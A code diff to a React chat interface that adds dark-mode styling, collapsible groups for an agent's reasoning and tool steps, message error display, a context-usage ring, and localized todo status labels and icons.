@@ -2608,7 +3348,7 @@ export default function SessionChat({
                               ? 'border-red-200 bg-red-50 text-red-700'
                               : isUploading
                                 ? 'border-sky-200 bg-sky-50 text-sky-700'
-                                : 'border-gray-200 bg-gray-50 text-gray-700'
+                                : 'border-gray-200 bg-gray-50 text-gray-700 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-200'
                           }`}
                         >
                           {isUploading ? (
@@ -2698,8 +3438,8 @@ export default function SessionChat({
                             ? t('chat.placeholderNodeRef', { nodeId: nodeRef.id })
                             : effectivePlaceholder
                     }
-                    className={`w-full resize-none outline-none bg-transparent text-sm placeholder-zinc-400 ${
-                      sending ? 'text-zinc-400 cursor-not-allowed' : 'text-zinc-900'
+                    className={`w-full resize-none outline-none bg-transparent text-sm placeholder-zinc-400 dark:placeholder-zinc-600 ${
+                      sending ? 'text-zinc-400 cursor-not-allowed dark:text-zinc-500' : 'text-zinc-900 dark:text-zinc-100'
                     }`}
                     style={{
                       minHeight: `${effectiveComposerTextareaMinHeight}px`,
@@ -2722,7 +3462,7 @@ export default function SessionChat({
                     <Paperclip className="h-4 w-4" />
                   </button>
 
-                  <div className="mx-1 h-4 w-px shrink-0 bg-zinc-200" />
+                  <div className="mx-1 h-4 w-px shrink-0 bg-zinc-200 dark:bg-zinc-800" />
 
                   {toolbarSlot}
 
@@ -2734,10 +3474,13 @@ export default function SessionChat({
 
                   <div className="flex-1" />
 
-                  {contextWindowTokens && contextWindowTokens > 0 && (
+                  {resolvedContextWindowTokens > 0 && (
                     <ContextUsageRing
                       percent={contextUsagePercent}
                       title={contextUsageTitle}
+                      usedTokens={estimatedContextTokens}
+                      totalTokens={resolvedContextWindowTokens}
+                      breakdown={contextUsageBreakdown}
                     />
                   )}
 
@@ -2768,7 +3511,7 @@ export default function SessionChat({
                       className={`inline-flex h-8 w-8 items-center justify-center rounded-full transition-all ${
                         canSend
                           ? 'bg-sky-500 text-white hover:bg-sky-600 shadow-sm hover:shadow'
-                          : 'bg-zinc-200 text-zinc-400 cursor-not-allowed'
+                          : 'cursor-not-allowed border border-zinc-300 bg-zinc-200 text-zinc-400 dark:border-[#5a6573] dark:bg-[#46515e] dark:text-[#b8c2cc]'
                       }`}
                     >
                       {sending || hasUploadingFiles ? <Loader2 className="w-4 h-4 animate-spin" /> : <ArrowUp className="w-4 h-4" strokeWidth={2.5} />}
@@ -2815,10 +3558,10 @@ function AgentMentionDropdown({
 
   return (
     <div
-      className="absolute bottom-full left-0 right-0 mb-1 z-50 overflow-hidden rounded-lg border border-gray-200 bg-white shadow-lg"
+      className="absolute bottom-full left-0 right-0 z-50 mb-1 overflow-hidden rounded-lg border border-gray-200 bg-white shadow-lg dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30"
       onMouseDown={(e) => e.preventDefault()}
     >
-      <div className="border-b border-gray-100 bg-gray-50 px-3 py-1.5 text-[10px] font-semibold uppercase tracking-wide text-gray-400">
+      <div className="border-b border-gray-100 bg-gray-50 px-3 py-1.5 text-[10px] font-semibold uppercase tracking-wide text-gray-400 dark:border-zinc-800 dark:bg-zinc-950 dark:text-zinc-500">
         {t('chat.mention.title')}
       </div>
       <div ref={listRef} className="max-h-64 overflow-y-auto p-1">
@@ -2831,17 +3574,17 @@ function AgentMentionDropdown({
               onClick={() => onSelect(agent)}
               onMouseDown={(e) => e.preventDefault()}
               className={`flex w-full min-w-0 items-center gap-2 rounded-md px-2 py-1.5 text-left transition-colors ${
-                idx === selectedIndex ? 'bg-sky-50 text-sky-800' : 'text-gray-800 hover:bg-gray-50'
+                idx === selectedIndex ? 'bg-sky-50 text-sky-800 dark:bg-sky-950/45 dark:text-sky-100' : 'text-gray-800 hover:bg-gray-50 dark:text-zinc-200 dark:hover:bg-zinc-800'
               }`}
             >
-              <Bot className="h-3.5 w-3.5 shrink-0 text-gray-400" />
+              <Bot className="h-3.5 w-3.5 shrink-0 text-gray-400 dark:text-zinc-500" />
               <span className="shrink-0 font-mono text-sm font-semibold">@{agent.name}</span>
-              <span className="min-w-0 truncate text-xs text-gray-500">{desc}</span>
+              <span className="min-w-0 truncate text-xs text-gray-500 dark:text-zinc-400">{desc}</span>
             </button>
           );
         })}
       </div>
-      <div className="flex gap-3 border-t border-gray-100 bg-gray-50 px-3 py-1 text-[10px] text-gray-400">
+      <div className="flex gap-3 border-t border-gray-100 bg-gray-50 px-3 py-1 text-[10px] text-gray-400 dark:border-zinc-800 dark:bg-zinc-950 dark:text-zinc-500">
         <span><kbd className="font-mono">↑↓</kbd> {t('chat.mention.navigate')}</span>
         <span><kbd className="font-mono">Enter</kbd>/<kbd className="font-mono">Tab</kbd> {t('chat.mention.select')}</span>
       </div>
@@ -2861,6 +3604,8 @@ export interface ChatMessageBubbleProps {
   onQuestionReject?: (callID: string, requestId: string) => Promise<void>;
   showActions?: boolean;
   showTimestamp?: boolean;
+  collapseIntermediateSteps?: boolean;
+  processGroupsDefaultOpen?: boolean;
   compact?: boolean;
   onCopy?: (text: string) => void;
   editingMessageId?: string | null;
@@ -2873,8 +3618,32 @@ export interface ChatMessageBubbleProps {
   onEditSave?: () => Promise<void>;
   onEditSend?: () => Promise<void>;
   onRegenerate?: (messageId: string) => Promise<void>;
-  /** Compacted messages that precede this summary message */
-  compactedMessages?: MergedMessage[];
+}
+
+function ProcessGroupDetails({
+  defaultOpen,
+  children,
+}: {
+  defaultOpen: boolean;
+  children: React.ReactNode;
+}) {
+  const detailsRef = useRef<HTMLDetailsElement>(null);
+
+  useLayoutEffect(() => {
+    if (detailsRef.current) {
+      detailsRef.current.open = defaultOpen;
+    }
+  }, [defaultOpen]);
+
+  return (
+    <details
+      ref={detailsRef}
+      data-testid="chat-process-group"
+      className="group/process mt-2 first:mt-0 overflow-hidden rounded-lg border border-zinc-200/90 bg-white/80 shadow-none"
+    >
+      {children}
+    </details>
+  );
 }
 
 function ChatMessageBubbleInner({
@@ -2885,6 +3654,8 @@ function ChatMessageBubbleInner({
   onQuestionReject,
   showActions = false,
   showTimestamp = false,
+  collapseIntermediateSteps = false,
+  processGroupsDefaultOpen = false,
   compact = true,
   onCopy,
   editingMessageId,
@@ -2897,7 +3668,6 @@ function ChatMessageBubbleInner({
   onEditSave,
   onEditSend,
   onRegenerate,
-  compactedMessages,
 }: ChatMessageBubbleProps) {
   const { t } = useTranslation('session');
   const isUser = message.role === 'user';
@@ -2909,33 +3679,13 @@ function ChatMessageBubbleInner({
   // instead — same UX, no popup blocker / data-URL restriction headaches.
   const [previewImage, setPreviewImage] = useState<{ url: string; alt?: string } | null>(null);
   if (message.finish === 'summary') {
-    const hasArchived = compactedMessages && compactedMessages.length > 0;
     return (
-      <div className="my-3 px-1">
-        {/* Archived messages shown inline without collapse */}
-        {hasArchived && (
-          <div className="mb-3 space-y-3">
-            {compactedMessages!.map((cMsg) => (
-              <ChatMessageBubble
-                key={cMsg.id}
-                message={cMsg}
-                showTimestamp={showTimestamp}
-                compact={compact}
-                onCopy={onCopy}
-                editingMessageId={editingMessageId}
-                editingText={editingText}
-                actionsDisabled={actionsDisabled}
-                actionMessageId={actionMessageId}
-                onEditStart={onEditStart}
-                onEditChange={onEditChange}
-                onEditCancel={onEditCancel}
-                onEditSave={onEditSave}
-                onEditSend={onEditSend}
-                onRegenerate={onRegenerate}
-              />
-            ))}
-          </div>
-        )}
+      <div className={getCompactionDividerClassName(compact)}>
+        <span className="h-px flex-1 bg-zinc-200" />
+        <span className="shrink-0 px-1.5 font-medium text-zinc-500">
+          {t('chat.contextCompressed')}
+        </span>
+        <span className="h-px flex-1 bg-zinc-200" />
       </div>
     );
   }
@@ -2957,22 +3707,28 @@ function ChatMessageBubbleInner({
   const editableRawText = latestEditablePart?.text || '';
   const isEditing = !!targetPartId && editingMessageId === targetMessageId;
   const isActionPending = actionMessageId === targetMessageId;
+  const instructionDisplayLabel = isUser && !isEditing && editableTextParts.length === 1
+    ? parseInstructionDisplayText(getMessagePartDisplayText(editableTextParts[0]))
+    : null;
 
-  const bubbleClass = getMessageBubbleClassName({ compact, isUser, isEditing });
+  const bubbleClass = instructionDisplayLabel
+    ? getInstructionDisplayBubbleClassName(compact)
+    : getMessageBubbleClassName({ compact, isUser, isEditing });
   const messageGroupClass = getMessageGroupClassName({ compact, isUser, isEditing });
   const actionBarClass = `flex items-center gap-1.5`;
   const editingActionBarClass = getEditingActionBarClassName();
-  const iconButtonClass = 'group/action relative inline-flex h-6 w-6 items-center justify-center rounded-full border border-gray-200/80 bg-white/80 text-gray-400 transition-colors duration-150 hover:border-gray-300 hover:text-gray-700 disabled:opacity-40 disabled:cursor-not-allowed';
+  const iconButtonClass = 'group/action relative inline-flex h-6 w-6 items-center justify-center rounded-full border border-gray-200/80 bg-white/80 text-gray-400 transition-colors duration-150 hover:border-gray-300 hover:text-gray-700 disabled:opacity-40 disabled:cursor-not-allowed dark:border-zinc-800 dark:bg-zinc-900/80 dark:text-zinc-500 dark:hover:border-zinc-700 dark:hover:text-zinc-200';
   const tooltipClass = 'pointer-events-none absolute bottom-full left-1/2 z-10 mb-1.5 -translate-x-1/2 whitespace-nowrap rounded-md bg-gray-900 px-2 py-1 text-[11px] font-medium text-white opacity-0 shadow-sm transition-opacity duration-150 group-hover/action:opacity-100';
+  const messageErrorText = isUser ? '' : getMessageErrorText(message);
 
   const avatarSize = compact ? 'w-7 h-7 text-xs' : 'w-8 h-8 text-sm';
 
   const avatar = isUser ? (
-    <span className={`inline-flex items-center justify-center rounded-full bg-gradient-to-b from-sky-400 to-blue-500 text-white shadow-sm ring-2 ring-white flex-shrink-0 ${avatarSize}`}>
+    <span className={`inline-flex items-center justify-center rounded-full bg-gradient-to-b from-sky-400 to-blue-500 text-white shadow-sm ring-2 ring-white flex-shrink-0 dark:ring-zinc-950 ${avatarSize}`}>
       <User className={compact ? 'w-3 h-3' : 'w-3.5 h-3.5'} />
     </span>
   ) : (
-    <span className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 ${avatarSize}`}>
+    <span className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 dark:ring-zinc-950 ${avatarSize}`}>
       {agentName.charAt(0).toUpperCase()}
     </span>
   );
@@ -2989,11 +3745,18 @@ function ChatMessageBubbleInner({
             {t('chat.sending')}
           </div>
         ) : (
-          <div className="flex items-center gap-1 py-1" aria-label={t('chat.thinking')}>
-            <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce [animation-delay:-0.3s]" />
-            <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce [animation-delay:-0.15s]" />
-            <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce" />
-          </div>
+          messageErrorText ? (
+            <div className="flex items-start gap-2 py-1 text-sm text-red-700" role="alert">
+              <AlertCircle className="mt-0.5 h-4 w-4 flex-shrink-0 text-red-500" />
+              <span className="whitespace-pre-wrap break-words">{messageErrorText}</span>
+            </div>
+          ) : (
+            <div className="flex items-center gap-1 py-1" aria-label={t('chat.thinking')}>
+              <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce [animation-delay:-0.3s]" />
+              <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce [animation-delay:-0.15s]" />
+              <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce" />
+            </div>
+          )
         )
       )}
 
@@ -3014,6 +3777,186 @@ function ChatMessageBubbleInner({
           // UX for "look at this image and …" style messages.
           const fileParts = parts.filter((p) => p.type === 'file' && p.url);
           const displayParts = parts.filter((p) => !(p.type === 'file' && p.url));
+          const isBlockingQuestionToolPart = (part: MessagePart): boolean => {
+            if (part.type !== 'tool') return false;
+            if (part.callID && pendingQuestions?.[part.callID]) return true;
+            const toolName = (part.tool || '').toLowerCase();
+            return toolName === 'question' || toolName === 'request_user_input' || toolName.includes('question');
+          };
+          const isIntermediateProcessPart = (part: MessagePart): boolean => {
+            if (part.type === 'reasoning' || part.type === 'thinking') {
+              return !!getRenderableThinkingText(part);
+            }
+            return part.type === 'tool' && !isBlockingQuestionToolPart(part);
+          };
+          const isRenderableDisplayPart = (part: MessagePart): boolean => {
+            if (isIntermediateProcessPart(part)) return true;
+            if (part.type === 'text') return !!getMessagePartDisplayText(part).trim();
+            if (part.type === 'tool') return true;
+            if (part.type === 'file') return !!part.url;
+            return false;
+          };
+          const renderPart = (part: MessagePart, i: number) => (
+            // Spacing between consecutive parts is owned by this wrapper,
+            // not by individual part components. Each part used to set its
+            // own `mt-2 first:mt-0`, but since every part lives in its own
+            // wrapper div, `first:` always matched and the gap collapsed
+            // to zero between, e.g., a tool card and the next thinking
+            // block, making them look glued together.
+            <div key={part.id || i} className="mt-2 first:mt-0">
+              {/* Text */}
+              {part.type === 'text' && (() => {
+                const rawText = part.text || '';
+                const nodeRefMatch = isUser
+                  ? rawText.match(/^@@node:([^|\n]+)\|([^\n]+)\n([\s\S]*)$/)
+                  : null;
+                const partDisplayText = getMessagePartDisplayText(part);
+                if (!partDisplayText.trim()) return null;
+                const displayText = nodeRefMatch && partDisplayText === rawText ? nodeRefMatch[3] : partDisplayText;
+                const instructionLabel = isUser ? parseInstructionDisplayText(displayText) : null;
+                if (instructionLabel) {
+                  return (
+                    <span className="inline-flex max-w-full items-center truncate text-sm font-semibold leading-none text-rose-700">
+                      {instructionLabel}
+                    </span>
+                  );
+                }
+                return (
+                  <>
+                    {nodeRefMatch && (
+                      <div className="flex items-center gap-1.5 mb-2 bg-gray-100 border border-gray-200 rounded-md px-2 py-1">
+                        <span className="w-1.5 h-1.5 rounded-full bg-gray-400 flex-shrink-0" />
+                        <code className="text-[10px] font-mono font-semibold text-gray-700 truncate">{nodeRefMatch[1]}</code>
+                        <span className="text-[9px] text-gray-500 flex-shrink-0">{nodeRefMatch[2]}</span>
+                      </div>
+                    )}
+                    <StreamingMarkdown
+                      content={displayText}
+                      isStreaming={isActive && !isUser}
+                    />
+                  </>
+                );
+              })()}
+
+              {/* Tool call */}
+              {part.type === 'tool' && (
+                <ChatToolPart
+                  part={part}
+                  pendingQuestion={part.callID ? pendingQuestions?.[part.callID] : undefined}
+                  onAnswer={onQuestionAnswer && part.callID
+                    ? (answers) => onQuestionAnswer(part.callID!, pendingQuestions![part.callID!].requestId, answers)
+                    : undefined}
+                  onReject={onQuestionReject && part.callID
+                    ? () => onQuestionReject(part.callID!, pendingQuestions![part.callID!].requestId)
+                    : undefined}
+                />
+              )}
+
+              {/* Reasoning / thinking */}
+              {(part.type === 'reasoning' || part.type === 'thinking') && (() => {
+                const thinkingText = getRenderableThinkingText(part);
+                if (!thinkingText) return null;
+                const partKey = part.id || `reasoning-${i}`;
+                const isExpanded = getPartExpanded(partKey);
+                const isThinking = !isReasoningDone;
+                return (
+                  // Vertical spacing is provided by the parent part wrapper
+                  // (the outer div returned by `renderPart`); keep this container neutral
+                  // so wrapper-level `mt-2 first:mt-0` is the single source of
+                  // truth for inter-part gaps.
+                  <div>
+                    <button
+                      onClick={() => togglePart(partKey)}
+                      disabled={isThinking}
+                      className="group/think w-full text-left"
+                    >
+                      <div className={`flex items-center gap-2 px-2.5 py-1.5 rounded-md border text-xs transition-colors ${
+                        isThinking
+                          ? 'bg-sky-50 border-sky-100'
+                          : 'bg-zinc-50 border-zinc-200 hover:bg-zinc-100'
+                      }`}>
+                        {isThinking ? (
+                          <>
+                            <Brain className="w-3.5 h-3.5 flex-shrink-0 text-violet-500" />
+                            <span className="text-violet-600">{t('chat.thinking')}</span>
+                          </>
+                        ) : (
+                          <>
+                            <Brain className="w-3.5 h-3.5 flex-shrink-0 text-violet-500" />
+                            <span className="text-zinc-500 truncate min-w-0">
+                              {thinkingText.slice(0, 80)}{thinkingText.length > 80 ? '…' : ''}
+                            </span>
+                            <ChevronDown className={`w-3 h-3 ml-auto text-zinc-400 flex-shrink-0 transition-transform ${isExpanded ? '' : '-rotate-90'}`} />
+                          </>
+                        )}
+                      </div>
+                    </button>
+                    {isExpanded && (
+                      <div className="mt-1 px-2.5 py-2 bg-zinc-50 rounded-md border border-zinc-200 text-[11px] text-zinc-500 whitespace-pre-wrap font-mono leading-relaxed max-h-52 overflow-y-auto">
+                        {thinkingText}
+                      </div>
+                    )}
+                  </div>
+                );
+              })()}
+            </div>
+          );
+          const renderProcessGroup = (group: Array<{ part: MessagePart; index: number }>, groupIndex: number) => {
+            const reasoningCount = group.filter(({ part }) => part.type === 'reasoning' || part.type === 'thinking').length;
+            const toolCount = group.filter(({ part }) => part.type === 'tool').length;
+            const summary = [
+              reasoningCount > 0 ? t('chat.process.reasoningCount', { count: reasoningCount }) : '',
+              toolCount > 0 ? t('chat.process.toolCount', { count: toolCount }) : '',
+            ].filter(Boolean).join(' · ');
+            const groupKey = group.map(({ part, index }) => part.id || index).join('-');
+            return (
+              <ProcessGroupDetails
+                key={`process-${groupIndex}-${groupKey}`}
+                defaultOpen={processGroupsDefaultOpen}
+              >
+                <summary className="flex cursor-pointer list-none items-center gap-2 px-2.5 py-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-50">
+                  <ListTree className="h-3.5 w-3.5 flex-shrink-0 text-zinc-400" />
+                  <span className="flex-shrink-0 font-semibold text-zinc-700">
+                    {t('chat.process.title', { count: group.length })}
+                  </span>
+                  {summary && (
+                    <span className="min-w-0 truncate text-zinc-500">
+                      {summary}
+                    </span>
+                  )}
+                  <ChevronDown className="ml-auto h-3 w-3 flex-shrink-0 text-zinc-400 transition-transform group-open/process:rotate-180" />
+                </summary>
+                <div className="border-t border-zinc-200/70 px-2.5 py-2">
+                  {group.map(({ part, index }) => renderPart(part, index))}
+                </div>
+              </ProcessGroupDetails>
+            );
+          };
+          const renderDisplayParts = () => {
+            if (!collapseIntermediateSteps || isUser) {
+              return displayParts.map(renderPart);
+            }
+            const nodes: React.ReactNode[] = [];
+            let processGroup: Array<{ part: MessagePart; index: number }> = [];
+            let processGroupIndex = 0;
+            const flushProcessGroup = () => {
+              if (processGroup.length === 0) return;
+              nodes.push(renderProcessGroup(processGroup, processGroupIndex));
+              processGroup = [];
+              processGroupIndex += 1;
+            };
+            displayParts.forEach((part, index) => {
+              if (isIntermediateProcessPart(part)) {
+                processGroup.push({ part, index });
+                return;
+              }
+              if (!isRenderableDisplayPart(part)) return;
+              flushProcessGroup();
+              nodes.push(renderPart(part, index));
+            });
+            flushProcessGroup();
+            return nodes;
+          };
           return (
             <>
               {fileParts.length > 0 && (
@@ -3041,104 +3984,12 @@ function ChatMessageBubbleInner({
                         <span className="truncate max-w-[240px]">{part.filename || 'file'}</span>
                       </div>
                     );
-                  })}
-                </div>
-              )}
-              {displayParts.map((part: MessagePart, i: number) => (
-                // Spacing between consecutive parts is owned by this wrapper,
-                // not by individual part components. Each part used to set its
-                // own `mt-2 first:mt-0`, but since every part lives in its own
-                // wrapper div, `first:` always matched and the gap collapsed
-                // to zero between, e.g., a tool card and the next thinking
-                // block, making them look glued together.
-                <div key={part.id || i} className="mt-2 first:mt-0">
-                  {/* Text */}
-                  {part.type === 'text' && part.text && (() => {
-                    const nodeRefMatch = isUser
-                      ? part.text.match(/^@@node:([^|\n]+)\|([^\n]+)\n([\s\S]*)$/)
-                      : null;
-                    const displayText = nodeRefMatch ? nodeRefMatch[3] : part.text;
-                    return (
-                      <>
-                        {nodeRefMatch && (
-                          <div className="flex items-center gap-1.5 mb-2 bg-gray-100 border border-gray-200 rounded-md px-2 py-1">
-                            <span className="w-1.5 h-1.5 rounded-full bg-gray-400 flex-shrink-0" />
-                            <code className="text-[10px] font-mono font-semibold text-gray-700 truncate">{nodeRefMatch[1]}</code>
-                            <span className="text-[9px] text-gray-500 flex-shrink-0">{nodeRefMatch[2]}</span>
-                          </div>
-                        )}
-                        <StreamingMarkdown
-                          content={displayText}
-                          isStreaming={isActive && !isUser}
-                        />
-                      </>
-                    );
-                  })()}
-
-                  {/* Tool call */}
-                  {part.type === 'tool' && (
-                    <ChatToolPart
-                      part={part}
-                      pendingQuestion={part.callID ? pendingQuestions?.[part.callID] : undefined}
-                      onAnswer={onQuestionAnswer && part.callID
-                        ? (answers) => onQuestionAnswer(part.callID!, pendingQuestions![part.callID!].requestId, answers)
-                        : undefined}
-                      onReject={onQuestionReject && part.callID
-                        ? () => onQuestionReject(part.callID!, pendingQuestions![part.callID!].requestId)
-                        : undefined}
-                    />
-                  )}
-
-                  {/* Reasoning / thinking */}
-                  {(part.type === 'reasoning' || part.type === 'thinking') && (part.text || part.thinking) && (() => {
-                    const thinkingText = part.text || part.thinking || '';
-                    const partKey = part.id || `reasoning-${i}`;
-                    const isExpanded = getPartExpanded(partKey);
-                    const isThinking = !isReasoningDone;
-                    return (
-                      // Vertical spacing is provided by the parent part wrapper
-                      // (see `otherParts.map` above); keep this container neutral
-                      // so wrapper-level `mt-2 first:mt-0` is the single source of
-                      // truth for inter-part gaps.
-                      <div>
-                        <button
-                          onClick={() => togglePart(partKey)}
-                          disabled={isThinking}
-                          className="group/think w-full text-left"
-                        >
-                          <div className={`flex items-center gap-2 px-2.5 py-1.5 rounded-md border text-xs transition-colors ${
-                            isThinking
-                              ? 'bg-sky-50 border-sky-100'
-                              : 'bg-zinc-50 border-zinc-200 hover:bg-zinc-100'
-                          }`}>
-                            {isThinking ? (
-                              <>
-                                <Brain className="w-3.5 h-3.5 flex-shrink-0 text-violet-500" />
-                                <span className="text-violet-600">{t('chat.thinking')}</span>
-                              </>
-                            ) : (
-                              <>
-                                <Brain className="w-3.5 h-3.5 flex-shrink-0 text-violet-500" />
-                                <span className="text-zinc-500 truncate min-w-0">
-                                  {thinkingText.slice(0, 80)}{thinkingText.length > 80 ? '…' : ''}
-                                </span>
-                                <ChevronDown className={`w-3 h-3 ml-auto text-zinc-400 flex-shrink-0 transition-transform ${isExpanded ? '' : '-rotate-90'}`} />
-                              </>
-                            )}
-                          </div>
-                        </button>
-                        {isExpanded && (
-                          <div className="mt-1 px-2.5 py-2 bg-zinc-50 rounded-md border border-zinc-200 text-[11px] text-zinc-500 whitespace-pre-wrap font-mono leading-relaxed max-h-52 overflow-y-auto">
-                            {thinkingText}
-                          </div>
-                        )}
-                      </div>
-                    );
-                  })()}
-                </div>
-              ))}
-            </>
-          );
+                    })}
+                  </div>
+                )}
+                {renderDisplayParts()}
+              </>
+            );
         })()
       )}
 
@@ -3256,14 +4107,62 @@ function ChatMessageBubbleInner({
   ) : null;
 
   if (isUser) {
+    if (!compact) {
+      return (
+        <div className="group relative flex w-full min-w-0 justify-end">
+          <div className={`flex min-w-0 flex-col items-end ${isEditing ? 'w-full' : 'max-w-[88%]'}`}>
+            {bubble}
+            {footer}
+          </div>
+          <div className="absolute -right-10 top-1">
+            {avatar}
+          </div>
+          {previewImage && (
+            <ImageLightbox
+              src={previewImage.url}
+              alt={previewImage.alt}
+              onClose={() => setPreviewImage(null)}
+            />
+          )}
+        </div>
+      );
+    }
+
     return (
-      <div className={`group relative ${!compact ? 'w-full' : ''} flex justify-end`}>
-        <div className={`relative flex flex-col items-end gap-2 ${messageGroupClass}`}>
+      <div className={`group relative ${!compact ? 'w-full' : ''} flex min-w-0 justify-end`}>
+        <div className={`flex min-w-0 items-start justify-end gap-2 ${messageGroupClass}`}>
+          <div className={`flex min-w-0 flex-col items-end ${isEditing ? 'w-full' : 'max-w-full'}`}>
+            {bubble}
+            {footer}
+          </div>
           <div className={getUserAvatarContainerClassName(compact)}>
             {avatar}
           </div>
-          <div aria-hidden="true" className={getUserAvatarSpacerClassName(compact)} />
-          <div className={`flex flex-col min-w-0 ${isEditing ? 'w-full' : 'w-fit max-w-full'}`}>
+        </div>
+        {previewImage && (
+          <ImageLightbox
+            src={previewImage.url}
+            alt={previewImage.alt}
+            onClose={() => setPreviewImage(null)}
+          />
+        )}
+      </div>
+    );
+  }
+
+  if (!compact) {
+    return (
+      <div className="group relative flex w-full min-w-0">
+        <div className="absolute -left-10 top-1">
+          {avatar}
+        </div>
+        <div className="flex w-full min-w-0 flex-col items-start">
+          <div className={`flex items-center gap-2 ${headerHeight}`}>
+            <span className="text-xs font-semibold text-zinc-700 dark:text-zinc-300">
+              {agentName}
+            </span>
+          </div>
+          <div className="flex w-full min-w-0 flex-col">
             {bubble}
             {footer}
           </div>
@@ -3280,12 +4179,12 @@ function ChatMessageBubbleInner({
   }
 
   return (
-    <div className={`group relative ${!compact ? 'w-full' : ''} flex`}>
+    <div className="group relative flex">
       <div className={`flex gap-2.5 ${messageGroupClass}`}>
         {avatar}
         <div className="flex flex-col items-start flex-1 min-w-0">
           <div className={`flex items-center gap-2 ${headerHeight}`}>
-            <span className="text-xs font-semibold text-zinc-700">
+            <span className="text-xs font-semibold text-zinc-700 dark:text-zinc-300">
               {agentName}
             </span>
           </div>
@@ -3333,6 +4232,7 @@ type TodoSummaryEntry = {
   status?: string;
   activeForm?: string;
 };
+type TodoTranslator = (key: string) => string;
 
 function isTodoSummaryEntry(value: unknown): value is TodoSummaryEntry {
   if (!value || typeof value !== 'object') return false;
@@ -3367,7 +4267,7 @@ function getTodoActionLabel(action: unknown): string {
   return 'Todos';
 }
 
-export function buildTodoSummary(state: Partial<ToolState>): string {
+export function buildTodoSummary(state: Partial<ToolState>, t?: TodoTranslator): string {
   const metadata = state.metadata ?? {};
   const currentTodos = pickTodoEntries(metadata.newTodos, metadata.todos, state.input?.todos);
   if (currentTodos.length === 0) return getTodoActionLabel(state.input?.action);
@@ -3381,42 +4281,80 @@ export function buildTodoSummary(state: Partial<ToolState>): string {
   let summary =
     terminalCount === totalCount
       ? hasCancelled
-        ? `Done ${terminalCount}/${totalCount}`
-        : `Completed ${terminalCount}/${totalCount}`
-      : `Progress ${terminalCount}/${totalCount}`;
+        ? `${t?.('chat.tool.todoSummary.done') ?? 'Done'} ${terminalCount}/${totalCount}`
+        : `${t?.('chat.tool.todoSummary.completed') ?? 'Completed'} ${terminalCount}/${totalCount}`
+      : `${t?.('chat.tool.todoSummary.progress') ?? 'Progress'} ${terminalCount}/${totalCount}`;
 
   if (inProgressCount > 0 && terminalCount < totalCount) {
-    summary += ` · In progress ${inProgressCount}`;
+    summary += ` · ${t?.('chat.tool.todoSummary.inProgress') ?? 'In progress'} ${inProgressCount}`;
   }
 
   return summary;
 }
 
-function todoStatusLabel(status: string | undefined): string {
+function todoStatusLabel(status: string | undefined, t: TodoTranslator): string { // Localized label for one todo status.
   switch (status) {
     case 'completed':
-      return 'completed';
+      return t('chat.tool.todoStatus.completed');
     case 'in_progress':
-      return 'in progress';
+      return t('chat.tool.todoStatus.inProgress');
     case 'cancelled':
-      return 'cancelled';
+      return t('chat.tool.todoStatus.cancelled');
     case 'pending':
-      return 'pending';
+      return t('chat.tool.todoStatus.pending');
     default:
-      return status || 'pending';
+      return status || t('chat.tool.todoStatus.pending'); // Unknown statuses pass through verbatim; a missing one reads as localized "pending".
   }
 }
 
-function todoStatusClass(status: string | undefined): string {
+function todoStatusIcon(status: string | undefined): React.ReactNode { // Small round status glyph for one todo row.
   switch (status) {
     case 'completed':
-      return 'bg-emerald-50 text-emerald-700 border-emerald-100';
+      return (
+        <span className="flex h-4 w-4 items-center justify-center rounded-full bg-emerald-500 text-white">
+          <Check className="h-3 w-3" strokeWidth={3} />
+        </span>
+      );
+    case 'in_progress': // Outlined circle with a sky-colored dot in the middle.
+      return (
+        <span className="flex h-4 w-4 items-center justify-center rounded-full border border-sky-400 bg-white">
+          <span className="h-1.5 w-1.5 rounded-full bg-sky-500" />
+        </span>
+      );
+    case 'cancelled': // Muted grey disc with an X.
+      return (
+        <span className="flex h-4 w-4 items-center justify-center rounded-full bg-zinc-200 text-zinc-500">
+          <X className="h-2.5 w-2.5" strokeWidth={2.5} />
+        </span>
+      );
+    default: // Pending, missing, or unrecognized status: empty outlined circle.
+      return <span className="h-4 w-4 rounded-full border border-zinc-300 bg-white" />;
+  }
+}
+
+function todoTextClass(status: string | undefined): string { // Text classes for a todo row's content, chosen by status.
+  switch (status) {
+    case 'completed':
+      return 'text-zinc-500';
     case 'in_progress':
-      return 'bg-sky-50 text-sky-700 border-sky-100';
+      return 'font-medium text-zinc-800';
     case 'cancelled':
-      return 'bg-zinc-100 text-zinc-500 border-zinc-200';
+      return 'text-zinc-400 line-through decoration-zinc-300';
     default:
-      return 'bg-amber-50 text-amber-700 border-amber-100';
+      return 'text-zinc-600';
+  }
+}
+
+function todoStatusLabelClass(status: string | undefined): string { // Text color class for the status label beside a todo row.
+  switch (status) {
+    case 'completed':
+      return 'text-emerald-600';
+    case 'in_progress':
+      return 'text-sky-600';
+    case 'cancelled': // Same color as the default branch; listed explicitly alongside the other statuses.
+      return 'text-zinc-400';
+    default:
+      return 'text-zinc-400';
   }
 }
 
@@ -3440,15 +4378,15 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
   const state: Partial<ToolState> = part.state || {};
   const status = state.status || 'pending';
 
-  // Some tools block on an internal `question` call (for example safety
-  // confirmation inside `ssh_host_cmd`), so render the question UI whenever
-  // this running tool part has a pending question attached to it.
-  const isWaitingForAnswer = status === 'running' && !!pendingQuestion;
+  // Pending question state is the source of truth. Tool status can briefly
+  // arrive as completed after reconnects or transport races, but the user
+  // still needs the answer UI while the question request exists.
+  const isWaitingForAnswer = !!pendingQuestion;
 
   type StatusCfg = {
     icon: React.ReactNode;
     iconColor: string;
-    pill: string;      // 状态 pill 样式
+    pill: string;      // Status pill classes.
     label: string;
   };
   const statusConfig: Record<string, StatusCfg> = {
@@ -3489,18 +4427,22 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
